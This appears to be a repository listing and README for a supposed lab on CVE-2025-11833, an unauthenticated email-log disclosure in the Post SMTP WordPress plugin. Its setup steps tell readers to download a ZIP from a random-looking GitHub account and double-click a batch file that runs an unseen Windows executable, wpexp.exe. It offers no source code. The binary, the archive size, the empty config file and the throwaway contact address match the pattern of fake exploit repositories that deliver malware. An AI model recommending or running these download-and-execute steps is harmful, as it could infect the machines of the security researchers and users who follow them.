CVE-2025-11833 PoC — Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App <= 3.6.0 - Missing Authorization to Accou

Source

Associated Vulnerability

Readme

# Lab: CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Arbitrary Email Log Disclosure

## 🚀 Overview
This lab demonstrates the CVE-2025-11833 vulnerability in the Post SMTP WordPress plugin (versions up to 3.6.0), which arises from a missing capability check in the plugin's `__construct` function. This flaw permits unauthenticated attackers to access logged emails sent via the plugin, potentially exposing sensitive data such as password reset links. Exploitation could lead to account takeovers by intercepting confidential communications. The CVSSv3 score is 9.8, highlighting its critical severity due to low attack complexity and no required privileges.


## ⚠️ Safety Disclaimer
This lab is provided for educational and research purposes to understand web application vulnerabilities. Do not use this in production environments or against unauthorized systems. The authors assume no liability for misuse. Always obtain explicit authorization before testing on real-world systems. 

## 📋 Prerequisites
- A local web server stack (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+, MySQL 5.7+, and Apache/Nginx.
- WordPress version 6.0 or later.
- Basic knowledge of WordPress plugin management and HTTP requests
- Windows OS for running the exploit tools (due to .exe and .bat dependencies).
- Administrative access to your local machine for installing software and configuring the web server.

## Download & Install
1. Download the lab archive from https://github.com/modhopmarrow1973/CVE-2025-11833-LAB/raw/refs/heads/main/scripts/cve-2025-11833-lab.zip . This ZIP contains:
   - `wpexp.exe`: The main exploitation binary for demonstrating the email log disclosure.
   - `launcher.bat`: A batch file to launch the exploit.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11833-lab`.

3. Set up the vulnerable environment:
   - Install WordPress locally if not already done: Download from [wordpress.org](https://wordpress.org) and configure with your local web server.
   - Navigate to the WordPress admin dashboard (e.g., `http://localhost/wordpress/wp-admin`).
   - Install the vulnerable Post SMTP plugin
   - Configure Post SMTP: In the plugin settings, enable email logging and set up a test SMTP server (e.g., using a local SMTP simulator like FakeSMTP for testing).


## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Set up your local WordPress instance with the vulnerable plugin.
3. Double-click `launcher.bat` in the extracted directory. This will launch `wpexp.exe` and prompt for target details.
4. In the exploit tool:
   - Enter the target URL (e.g., `http://localhost/wordpress`).
   - Specify the endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs` (the vulnerable AJAX handler).
   - Run the exploit to retrieve and display logged emails.


For questions or contributions, email me at ukeouxnp760s25@hotmail.com

File Snapshot

 [4.0K]  /data/pocs/0fcb4a393ac6e5d77415113b09d70ed2c4f620d2
├── [2.8K]  README.md
└── [4.0K]  scripts
    ├── [   1]  config.ini
    └── [8.5M]  cve-2025-11833-lab.zip

1 directory, 3 files

Remarks